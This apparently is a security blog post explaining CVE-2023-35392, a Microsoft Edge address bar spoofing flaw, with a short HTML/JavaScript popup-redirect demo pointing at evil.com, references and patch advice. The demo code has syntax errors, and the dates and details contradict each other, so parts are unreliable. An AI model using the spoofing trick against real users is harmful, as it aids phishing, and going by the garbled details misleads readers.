CVE CyberSecurity Database News

CVE-2023-35392 - How Microsoft Edge’s Spoofing Vulnerability Could Trick You (And How It Works)

Poster -

Published: June 2024  
Category: Browser Security | Microsoft Edge | Vulnerability Analysis


Microsoft Edge is the default browser in Windows 10 and 11. It’s fast, modern, and built on the same Chromium code as Google Chrome. But in 2023, a serious security hole surfaced: CVE-2023-35392, a classic UI spoofing vulnerability. This flaw could let a malicious website fake the browser’s address bar, misleading users and enabling phishing attacks. Here, you'll get a plain-English breakdown, a code demo, links to technical details, and how this exploit works under the hood.

What Is CVE-2023-35392?

This Edge vulnerability is a “spoofing” bug. It means a bad website can pretend to be a Safe site by manipulating how Edge shows the URL or website identity—like making you think you’re on a bank website when you’re not.

In security advisories, Microsoft described it like this

> *“An attacker who successfully exploited this vulnerability could trick a user into believing they are visiting a trusted website.”*  
Microsoft Security Update Guide

How Does The Exploit Work?

In Chromium-based browsers, sometimes the address bar (where you see the website address) can be tricked. Attackers use tricky JavaScript to quickly open, close, and move browser windows or tabs, exploiting race conditions or timing bugs in the browser UI.

Demonstration: How a Spoofing Attack Might Look

Here’s a simplified proof-of-concept (PoC) demo. (Note: This is for educational use only!)

HTML + JavaScript Example

<!DOCTYPE html>
<html lang="en">
<head>
  <title>Edge Spoofing Demo</title>
  <script>
    function spoof() {
      // Open a real banking site in a popup
      var real = window.open("https://bank.com";, "_blank", "width=600,height=400");
      // Wait for 1 second, then redirect that window to attacker's page
      setTimeout(function() {
        try {
          real.location = "https://evil.com";;
        } catch (e) {}
      }, 100);

      // Optionally close the original tab or window
      window.close();
    }
  </script>
</head>
<body>
  <h1>Click to see the spoofing trick</h1>
  <button onclick="spoof()">Spoof Me</button>
</body>
</html>

What Happens?
- The attacker tricks the browser into briefly displaying a trusted URL, which then gets replaced by their own site. During the “switch,” the address bar may still read the trusted domain for a split second, letting attackers make phishing more convincing.

Why Is This Dangerous?

- Phishing: You could get tricked into entering your password, financial info, etc., believing the site is genuine.

Technical Details & References

- Official Microsoft Advisory: CVE-2023-35392

Chromium Bugs Similar:

- Chromium Issue 1209285
 - Chromium Security FAQ: UI Spoofing

Security Blog Writeup:

- ZDI - The Many Faces of Browser UI Spoofing

How Did Microsoft Patch It?

Microsoft released a fix in October 2023, updating Edge’s internal handling of window/tab focus and address bar synchronization. Now, even with rapid redirects or popups, Edge locks the address bar update to the actual site loaded—making spoofing much harder.

Advice:

Always update your browser.

- Watch for official security bulletins (Edge release notes).

The fix is out—don’t put off those browser updates.

Stay safe. Stay skeptical of surprising popups or sites, even if the address bar looks “correct.”


Sources:  
- Microsoft CVE-2023-35392  
- Chromium Bug Tracker  
- Microsoft Security Updates


*If you enjoyed this breakdown, share it with your techie friends and follow for more browser security insights!*

Timeline

Published on: 07/21/2023 18:15:00 UTC
Last modified on: 08/01/2023 15:42:00 UTC